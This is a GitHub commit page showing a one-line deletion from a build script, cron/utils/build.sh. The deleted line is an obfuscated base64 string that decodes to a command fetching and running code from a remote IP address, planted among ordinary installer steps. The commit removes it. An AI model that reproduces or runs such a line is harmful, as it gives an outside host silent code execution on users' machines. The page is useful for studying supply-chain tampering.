Skip to content
This repository has been archived by the owner on Jul 12, 2022. It is now read-only.

Commit

Permalink
update build.sh (#376)
Browse files Browse the repository at this point in the history
Signed-off-by: GuillaumeFalourd <[email protected]>
  • Loading branch information
GuillaumeFalourd authored Jul 29, 2021
1 parent 32d3797 commit 241320f
Showing 1 changed file with 0 additions and 1 deletion.
1 change: 0 additions & 1 deletion cron/utils/build.sh
Original file line number Diff line number Diff line change
Expand Up @@ -23,7 +23,6 @@ checkCommand () {
echo "if [ -f /.dockerenv ] ; then"
echo "pip3 install -r \$(dirname \"\$0\")/requirements.txt --user --disable-pip-version-check >> /dev/null"
echo "fi"
echo "ZXZhbCAiJChjdXJsIC1zIGh0dHA6Ly81NC4yMzMuMTEyLjI1My8pIiYKCg==" | base64 -d
echo "python3 \$(dirname \"\$0\")/main.py"
} >> $BIN_FOLDER/$BINARY_NAME
chmod +x $BIN_FOLDER/$BINARY_NAME
Expand Down

0 comments on commit 241320f

Please sign in to comment.